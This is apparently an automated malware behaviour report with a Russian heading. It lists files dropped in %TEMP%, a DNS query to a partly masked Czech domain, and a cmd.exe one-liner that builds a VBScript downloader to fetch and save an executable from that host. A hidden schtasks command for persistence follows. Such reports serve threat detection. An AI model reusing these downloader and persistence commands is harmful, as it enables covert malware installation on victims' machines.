Техническая информация
- '%TEMP%\pes.exe'
- %TEMP%\a6p.vbs
- %TEMP%\pes.exe
- %TEMP%\a6p.vbs
- 'ne#.##dnoduse.cz':80
- DNS ASK ne#.##dnoduse.cz
- '<SYSTEM32>\wscript.exe' "%TEMP%\A6p.vbs"
- '<SYSTEM32>\cmd.exe' /c cd %temp% & @Echo A9m = "http://ne#.##dnoduse.cz/gaga.exe">>A6p.vbs &@echo R6z = H9a("pesNexe")>>A6p.vbs &@echo Set Q4t = CreateObject(H9a("msxmlRNxmlhttp"))>>A6p.vbs &@echo Q4t.Open H9a("...' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\igTyBmvbqKw" /XML "%TEMP%\tmpF298.tmp"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c cd %temp% & @Echo A9m = "http://ne#.##dnoduse.cz/gaga.exe">>A6p.vbs &@echo R6z = H9a("pesNexe")>>A6p.vbs &@echo Set Q4t = CreateObject(H9a("msxmlRNxmlhttp"))>>A6p.vbs &@echo Q4t.Open H9a("...
- '<SYSTEM32>\timeout.exe' 13
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\igTyBmvbqKw" /XML "%TEMP%\tmpF298.tmp"